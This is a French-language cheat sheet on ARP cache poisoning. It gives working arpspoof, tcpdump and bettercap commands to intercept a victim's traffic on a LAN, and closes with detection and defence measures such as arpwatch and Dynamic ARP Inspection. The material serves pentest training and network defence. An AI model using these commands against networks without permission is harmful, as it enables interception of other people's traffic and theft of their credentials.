ARP Spoof — Empoisonnement de cache ARP

MITM OSI L2

Qu'est-ce que l'ARP Spoofing ?

L'ARP Spoofing (ou ARP poisoning) exploite l'absence totale d'authentification du protocole ARP : un attaquant envoie des réponses ARP forgées (gratuitous ARP) pour associer sa propre adresse MAC à l'IP d'une autre machine (souvent la passerelle). Les victimes mettent à jour leur cache ARP avec cette fausse association et envoient leur trafic à l'attaquant sans le savoir — base de la majorité des attaques MITM sur réseau local.

Préparer le poste attaquant

# Activer le routage IP pour relayer le trafic intercepté
echo 1 > /proc/sys/net/ipv4/ip_forward

# Vérifier les tables ARP/voisins avant l attaque
ip neigh show
arp -a

Exécution avec arpspoof

# Empoisonner la victime : se faire passer pour la passerelle
arpspoof -i eth0 -t 192.168.1.10 192.168.1.1

# Empoisonner la passerelle : se faire passer pour la victime
# (nécessaire pour intercepter le trafic dans les deux sens)
arpspoof -i eth0 -t 192.168.1.1 192.168.1.10

# Capturer le trafic intercepté
tcpdump -i eth0 -w mitm_capture.pcap host 192.168.1.10

Avec bettercap (full MITM)

bettercap -iface eth0
> set arp.spoof.targets 192.168.1.10
> set arp.spoof.fullduplex true
> arp.spoof on
> net.sniff on
> set net.sniff.verbose true

Détection et défenses

Détection arpwatch alerte sur tout changement MAC/IP inattendu · surveiller les gratuitous ARP anormalement fréquents avec Wireshark (filtre arp.opcode==2)
Défenses Dynamic ARP Inspection (DAI) sur switches Cisco — valide les associations IP/MAC via DHCP snooping · entrées ARP statiques pour les hôtes critiques (passerelle) · ports switch en mode port-security · ségrégation VLAN pour réduire la surface d'attaque L2.